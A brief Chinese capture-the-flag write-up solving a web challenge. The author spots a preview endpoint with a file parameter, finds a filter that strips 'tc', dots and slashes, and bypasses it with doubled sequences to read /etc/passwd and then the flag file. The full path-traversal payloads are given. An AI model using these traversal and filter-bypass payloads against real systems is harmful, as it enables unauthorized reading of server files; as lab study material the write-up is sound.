查看源代码发现重要注释:
<!-- Hint : flag in f1ag_Is_h3re --> <!-- 趣味题,真的是为了出题而出题的,别打我。 By Virink -->
同时在源代码可看到一个上传目录:
<link rel="icon" href="/uploads/favicon.ico" type="image/x-icon" />
访问uploads,有两个超链接,分别是Preview和favicon.ico:
复制一下Preview的链接地址,得到:http://xxx/preview?f=favicon.ico
看到这个格式很容易想到文件包含,首先我读取了一下/etc/passwd
,回显:
{"msg":"File epasswd not found!","code":1}
仔细观察回显,发现过滤了tc
、.
、/
,经过测试,使用双写可以绕过:
/preview?f=….//….//….//….//….//….//etccc//passwd
flag就比较恶心了,藏在f1ag_Is_h3re/flag里:
f=….//….//….//….//….//….//f1ag_Is_h3re..//flag